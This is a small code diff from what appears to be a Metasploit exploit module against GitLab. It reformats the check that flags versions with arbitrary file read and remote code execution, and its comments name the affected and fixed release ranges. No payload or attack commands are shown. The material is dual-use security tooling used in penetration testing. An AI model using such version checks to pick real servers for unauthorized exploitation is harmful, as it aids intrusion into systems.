@@ -454,11 +454,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Arbitrary file reads are present from 8.5 and fixed in 12.9.1, 12.8.8, and 12.7.8
     # However, RCE is only available from 12.4 and fixed in 12.9.1, 12.8.8, and 12.7.8
-    has_rce_present = (
+    has_rce_present =
       version.between?(Rex::Version.new('12.4.0'), Rex::Version.new('12.7.7')) ||
-        version.between?(Rex::Version.new('12.8.0'), Rex::Version.new('12.8.7')) ||
-        version == Rex::Version.new('12.9.0')
-    )
+      version.between?(Rex::Version.new('12.8.0'), Rex::Version.new('12.8.7')) ||
+      version == Rex::Version.new('12.9.0')
+
     if has_rce_present
       return Exploit::CheckCode::Appears("GitLab #{version} is a vulnerable version.")
     end
